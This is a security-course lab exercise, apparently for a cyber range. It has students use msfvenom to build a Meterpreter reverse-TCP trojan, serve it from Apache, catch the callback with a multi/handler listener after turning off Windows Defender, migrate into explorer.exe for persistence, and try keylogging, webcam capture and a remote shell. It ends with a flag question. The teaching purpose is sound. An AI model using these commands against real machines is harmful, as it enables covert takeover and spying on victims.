H 320: Creating a Trojan with Metasploit (15 pts)

What You Need

Purpose

We will use Metasploit to create a an infectious EXE file.

A user who runs that file surrenders control of their computer.

Task 1: Configuring Networking

Finding Your Linux Server's IP Address

You need to find the IP address that allows your Windows system to reach your Linux server.

The exact commands required vary for different cyber range setups, as detailed in previous projects.

Ping Test

On your Windows machine, in a Command Prompt, execute this command to ping your Linux server, replacing the IP address with the correct address of your Linux server:
ping 192.168.100.1
You should see replies, as shown below:

Installing Apache

On your Linux server, execute these commands: 
sudo apt update
sudo apt install apache2 -y
sudo ss -lnt
You should see a listening process on port 80, as shown below:

Testing the Connection to Port 80

On your Windows machine, in a Web browser, enter this address, replacing the address with the address of your Linux server:
http://192.168.100.1
You should see a Web page, as shown below:

Installing Npcap

Since April of 2019, the Windows installer for Nmap has been broken. The workaround is to install Npcap first, to get the latest version.

On your Windows machine, in a Web browser, enter this address:

https://nmap.org/npcap/#download
Download and install the latest Windows version, as shown below.

Starting a socat Forwarder on Port 4444

On your Linux server, in a execute these commands: 
sudo apt install socat -y
socat TCP-LISTEN:4444,fork TCP:127.0.0.1:80
The terminal waits for a connection, as shown below:

Testing the Connection to Port 4444

On your Windows machine, in a Web browser, enter this address, replacing the address with the address of your Linux server:
http://192.168.100.1:4444
You should see a Web page, as shown below:

Once the test succeeds, on your Linux system, press Ctrl+C to stop socat.

Disabling Windows Defender

On your Windows system, click Start and type DEF

Launch "Windows Defender".

At the top right, click Settings.

Turn off "Real-time protection", as shown below:

Task 2: Creating Malware

Installing Metasploit

If you don't already have Metasploit installed on your Linux server, execute these commands: 
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
chmod 755 msfinstall
sudo ./msfinstall

Using Msfvenom to Make a Malicious EXE

On your Linux server, execute these commands to create a malicious Windows executable file named "fun.exe" and serve it from your Apache Web server.

Adjust the IP address to match the IP address of your Linux machine (the C&C server). 

sudo msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.100.1 -f exe -o /var/www/html/fun.exe
sudo service apache2 start
The operation proceeds without errors, as shown below.

Launching Msfconsole

On your Linux server, execute these commands, one at a time, to start a Metasploit listener: 
sudo msfconsole -q
use multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 0.0.0.0
exploit
Metasploit starts a "reverse TCP handler", as shown below.

Running the Malware on the Target Machine

On the target Windows machine, open a Web browser and open this URL, replacing the IP address with the IP address of your Linux machine:
http://192.168.100.1/fun.exe
Download the "fun.exe" file. Bypass any warning boxes, double-click the file, and allow it to run.

Note: if you are using antivirus, you will need to disable it. You will also need to disable Windows Defender. If you have problems disabling your malware protection, use the Windows 2008 Server virtual machine, which has no malware protection.

On your Linux machine, a meterpeter session opens, as shown below.

Using The Meterpreter Shell

On your Linux machine, at meterpreter > prompt, execute this command:
help
Several pages of help scroll by. Several interesting commands are available, as shown below.

Migrating to a Different Process

The Metasploit shell is running inside the "fun.exe" process. If the user closes that process, or logs off, the connection will be lost.

To become more persistent, we'll migrate to a process that will last longer.

To see a list of processes, at the meterpreter > prompt, execute this command: 

ps
Let's migrate to the explorer process.

At the meterpreter > prompt, execute this command: 

migrate -N explorer.exe
Migration is unreliable. It may succeed, but it may time out. If it times out, take these steps, as shown below: The migration should succeed, as shown below.

If you can't get it to work after a few tries, skip it and proceed to the next section.

Post-Exploitation

You now own the target! Here are some fun meterpreter commands to try:

screenshotGives you an image of the target's desktop
keyscan_startBegins capturing keys typed in the target. On the Windows target, open Notepad and type in some text, such as your name.
keyscan_dumpShows the keystrokes captured so far
webcam_listShows the available webcams (if any)
webcam_snapTakes a photo with the webcam
shellGives you a Windows Command Prompt on the target
exitLeaves the Windows Command Prompt

Viewing System Information

On your Linux machine, at meterpreter > prompt, execute this command:
sysinfo
A list of network connections appears, including one to a remote port of 4444, as highlighted in the image below.

Notice the "Meterpreter" name for this connection, which is redacted in the image below.

H 320.1: "Meterpreter" name (15 pts)

The flag is the "Meterpreter" name, which is redacted in the image above.
Moved to local server 3-21-19
Form removed 7-9-19
Updated with network tests 6-8-2020
pre added to commands 8-2-20
pre added to socat line 8-4-2020